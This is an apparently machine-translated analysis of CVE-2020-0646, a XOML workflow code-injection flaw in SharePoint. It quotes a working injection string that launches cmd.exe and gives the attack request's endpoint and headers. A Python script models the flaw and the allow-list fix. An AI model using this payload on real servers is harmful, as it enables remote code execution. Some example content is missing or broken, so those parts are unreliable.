
How to analyze remote Code execution vulnerabilities in SharePoint

2025-01-23 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)05/31 Report--

This article explains how to analyze a remote code execution vulnerability in SharePoint (CVE-2020-0646). The analysis is detailed; readers interested in the topic can use it as a reference, and I hope it is helpful to you.

In November 2019, security researchers discovered a code injection vulnerability in the workflow functionality of Microsoft SharePoint Online and reported it to Microsoft. An attacker who successfully exploits it can achieve remote code execution on the target system. Microsoft fixed the issue on the online platform shortly after receiving the report, but the underlying problem in the .NET Framework was not patched until January 2020. Therefore, an on-premises SharePoint installation that does not have the January 2020 .NET patch installed is still affected by this vulnerability.

Note that if your IIS configuration serves the .XOML extension, you may also be exposed to this vulnerability through file uploads.

Vulnerability Analysis of CVE-2020-0646

When a XOML file is compiled, an attacker can use certain attributes of activities in the System.Workflow.Activities namespace to execute arbitrary code on the SharePoint server. Because the injected code becomes part of the compiled workflow, the vulnerability also bypasses the workflow compiler's nocode option, which is supposed to prevent user code from being compiled at all.

The following XOML file shows an example of using the CallExternalMethodActivity class:

During compilation, the value of the InterfaceType attribute is copied verbatim into the temporary C# file that the compiler generates, so an attacker controls what ends up in that file:

```csharp
...
private void InitializeComponent() {
    ...
    this.codeActivity1.InterfaceType = typeof(System.String);}Object/**/test2=System.Diagnostics.Process.Start("cmd.exe","/c calc");private/**/void/**/foobar(){//);
    ...
}
...
```

Once the value lands there, the attacker has broken out of the original typeof(...) call and the enclosing method, and the injected field initializer executes arbitrary code. Note that in the example above, while the InterfaceType attribute is injectable, other string-typed attributes such as MethodName are correctly validated or escaped.

The ExecuteCode attribute of the CodeActivity class is affected in the same way, but it could not be exploited in SharePoint Online, only in the on-premises version. Other Activity classes are probably affected as well.

For example, with the following HTTP request the attacker executed arbitrary code on SharePoint Online (the SOAP body is not preserved here):

```http
POST http://[REDACTED].sharepoint.com/_vti_bin/webpartpages.asmx HTTP/1.1
Date: Tue, 29 Oct 2019 14:26:21 GMT
MIME-Version: 1.0
Accept: */*
SOAPAction: http://microsoft.com/sharepoint/webpartpages/ValidateWorkflowMarkupAndCreateSupportObjects
User-Agent: Mozilla/4.0 (compatible; MS FrontPage 15.0)
Host: [REDACTED].sharepoint.com
Accept-Language: en-us, en;q=0.1
Accept: auth/sicily
X-FORMS_BASED_AUTH_ACCEPTED: T
Content-Type: text/xml; charset=utf-8
X-Vermeer-Content-Type: text/xml; charset=utf-8
Accept-encoding: gzip, deflate
Connection: Keep-Alive
Pragma: no-cache
Content-Length: 1031
Cookie: [REDACTED]

] > 2
```

After the attack completes, the DNS name that the payload made the host resolve can be observed:

The same request can also be used to exploit the vulnerability in the on-premises version.

After the patch for CVE-2020-0646 is installed, the SharePoint workflow compiler checks all XML elements and attributes to ensure that they contain only a restricted set of legal characters. As a result, with the nocode option selected, an attacker can no longer inject arbitrary code into the generated C# code in the default configuration.
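The following Python script is an added example, not code from the original article or from the .NET Framework. It models the defect described above and the post-patch check: a XOML attribute value is pasted into generated C# source, first without any validation (the CVE-2020-0646 behaviour) and then behind an allow-list check on every element name and attribute value (the shape of the fix). The XOML namespaces, the activity names and the exact allowed character set are assumptions; the page shows neither the original XOML file nor the patched character set. The injection string is the one quoted on the page.

```python
"""Model of the CVE-2020-0646 injection: an XOML attribute value is copied into
generated C# source. validate=False is the pre-patch behaviour, validate=True
is a post-patch style allow-list check. This is a simulation for illustration;
it is not the System.Workflow compiler's own code."""
import re
import xml.etree.ElementTree as ET

# WF 3.x XOML namespaces (assumed; the article shows no XOML file).
WF_NS = "{http://schemas.microsoft.com/winfx/2006/xaml/workflow}"
X_NS = "{http://schemas.microsoft.com/winfx/2006/xaml}"

# The injection string from the article: closes typeof(...) and the enclosing
# method, declares a field whose initializer runs Process.Start, then opens a
# dummy method so the rest of the generated file still parses.
PAYLOAD = ('System.String);}Object/**/test2=System.Diagnostics.Process.Start('
           '"cmd.exe","/c calc");private/**/void/**/foobar(){//')


def xml_attr(value: str) -> str:
    """Escape a string for use inside a double-quoted XML attribute."""
    return (value.replace("&", "&amp;").replace("<", "&lt;")
            .replace('"', "&quot;"))


def build_xoml(interface_type: str, method_name: str = "ToString") -> str:
    """Constructed sample XOML with a single CallExternalMethodActivity."""
    return (
        '<SequentialWorkflowActivity x:Name="Workflow1"\n'
        '    xmlns="http://schemas.microsoft.com/winfx/2006/xaml/workflow"\n'
        '    xmlns:x="http://schemas.microsoft.com/winfx/2006/xaml">\n'
        '  <CallExternalMethodActivity x:Name="codeActivity1"\n'
        f'      InterfaceType="{xml_attr(interface_type)}"\n'
        f'      MethodName="{xml_attr(method_name)}" />\n'
        '</SequentialWorkflowActivity>'
    )


def cs_string(value: str) -> str:
    """Escape a value as the body of a C# string literal (what MethodName gets)."""
    return value.replace("\\", "\\\\").replace('"', '\\"')


# Conservative allow-list for element names, attribute names and attribute
# values (assumed; the real post-patch character set is not on the page).
ALLOWED = re.compile(r"[A-Za-z0-9_.:/\-]*")


class XomlValidationError(ValueError):
    pass


def check_markup(root: ET.Element) -> None:
    """Post-patch style check: reject any element or attribute name/value that
    contains a character outside the allow-list."""
    for el in root.iter():
        candidates = [el.tag.split("}")[-1]]
        for name, value in el.attrib.items():
            candidates.append(name.split("}")[-1])
            candidates.append(value)
        for s in candidates:
            if not ALLOWED.fullmatch(s):
                raise XomlValidationError(f"illegal characters in {s!r}")


def generate_csharp(xoml: str, validate: bool) -> str:
    """Emit the InitializeComponent() body a code generator would produce.
    InterfaceType goes into typeof(...) unquoted, which is the injection point;
    MethodName is emitted as an escaped string literal and is therefore safe."""
    root = ET.fromstring(xoml)
    if validate:
        check_markup(root)
    lines = ["private void InitializeComponent() {"]
    for act in root.iter(WF_NS + "CallExternalMethodActivity"):
        name = act.get(X_NS + "Name", "activity")
        iface = act.get("InterfaceType", "")
        method = act.get("MethodName", "")
        lines.append(f"    this.{name}.InterfaceType = typeof({iface});")
        lines.append(f'    this.{name}.MethodName = "{cs_string(method)}";')
    lines.append("}")
    return "\n".join(lines)


def compiles_with_validation(xoml: str) -> bool:
    """True if the markup survives the allow-list check."""
    try:
        generate_csharp(xoml, validate=True)
        return True
    except XomlValidationError:
        return False


if __name__ == "__main__":
    evil = build_xoml(PAYLOAD)
    print("--- pre-patch output ---")
    print(generate_csharp(evil, validate=False))
    print("--- post-patch ---")
    print("accepted" if compiles_with_validation(evil) else "rejected")
    print(generate_csharp(build_xoml("System.IComparable"), validate=True))
```

Running it shows the pre-patch generator emitting the injected `Process.Start("cmd.exe","/c calc")` field initializer between the closed `InitializeComponent()` and the dummy `foobar()` method, while the same markup is rejected by the allow-list check and a benign `InterfaceType="System.IComparable"` compiles under both paths. The allow-list approach mirrors the fix described above: it does not try to escape the value, because a value inside `typeof(...)` cannot be made safe by quoting, only by restricting it to characters that can form a type name.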

This concludes the analysis of the remote code execution vulnerability in SharePoint. I hope the content above is helpful to you. If you think the article is good, please share it so that more people can see it.
